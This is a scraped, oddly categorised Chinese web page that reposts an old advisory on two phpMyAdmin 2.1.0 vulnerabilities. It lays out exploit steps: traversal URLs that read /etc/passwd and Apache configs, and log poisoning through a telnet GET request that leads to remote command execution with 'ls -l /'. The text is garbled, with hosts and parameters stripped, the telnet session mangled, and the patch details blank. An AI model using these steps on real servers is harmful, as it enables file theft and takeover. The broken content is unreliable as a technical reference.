西方文学

phpMyAdmin2.1.0存在两个漏洞-PHP安全-PHP教程-幽默笑话

  • 作者:本站
  • 时间:2019-07-08
  • 2人已阅读
您现在的位置:首页 > 西方文学 > 文章
简介 文章内容存在两个漏洞修改时间:[2011/03/1311:11]阅读次数:[804]发表者:[起缘]phpMyAdmin(http:///projects/phpMyAdmin/)是一款管理M

phpMyAdmin2.1.0存在两个漏洞-PHP安全-PHP教程-幽默笑话

文章内容存在两个漏洞修改时间:[2011/03/1311:11]阅读次数:[804]发表者:[起缘]phpMyAdmin(http:///projects/phpMyAdmin/)是一款管理MySQL数据库的PHP工具,具有基于WEB的界面。

但是发现它存在漏洞。 可选择安装新发布稳定版本:。

1、目录遍历漏洞攻击者通过提供如下的URL:http:///phpMyAdmin/=/etc/passwdbtnDrop=No(*)http:///phpMyAdmin/tbl_=testtable=essgoto=/etc/passwd能非法访问系统文件有问题的代码在:include($goto);_、执行攻击者代码漏洞通过使用全局可写日志文件,攻击者能在受影响服务器上执行任意代码。

首先,得到Apache配置文件以便知道日志文件存储位置:http:///phpMyAdmin/=/etc/apache/conf/=Nohttp:///phpMyAdmin/=/etc/apache/conf/=Nohttp:///phpMyAdmin/=/etc/apache/conf/=No可以看出,日志放在:/var/log/httpd/error_log/var/log/httpd/access_log然后telnet到端口80#..^].GET^]telnetquitConnectionclosed.#在GET请求之后,攻击者能将任意PHP代码上传现在,可以用Apache用户身份远程运行命令了:http:///phpMyAdmin/=/var/log/httpd/access_logbtnDrop=Nometers=ls%20-l%20/受影响系统:解决方案:建议:1.使用:///phpmyadmin/用户下载安装补丁:http:///patches/摘自:。

Top